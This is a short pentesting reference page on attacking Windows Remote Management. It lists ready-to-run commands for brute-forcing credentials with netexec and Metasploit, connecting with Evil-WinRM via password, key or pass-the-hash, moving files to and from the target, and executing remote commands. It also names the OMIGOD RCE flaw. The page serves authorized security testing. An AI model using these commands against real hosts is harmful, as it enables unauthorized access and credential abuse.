Exploit Notes

WinRM (Windows Remote Management) Pentesting

Last modified: 2024-02-18

Windows

The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.

Enumeration

Brute Force Credentials

netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt 

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login

Connect with Evil-WinRM

Evil-WinRM is a Windows Remote Management shell for pentesting.
Below are list of commands for each situation.

Connect

evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S

If you have private key and public key, you can use them for authentication.

# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key

Commands

After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.

# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services

Command Execution with NetExec

# -x: Execute a command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'

# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'

OMIGOD (CVE-2021-38647)

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).

There are many PoC available, for instance:

References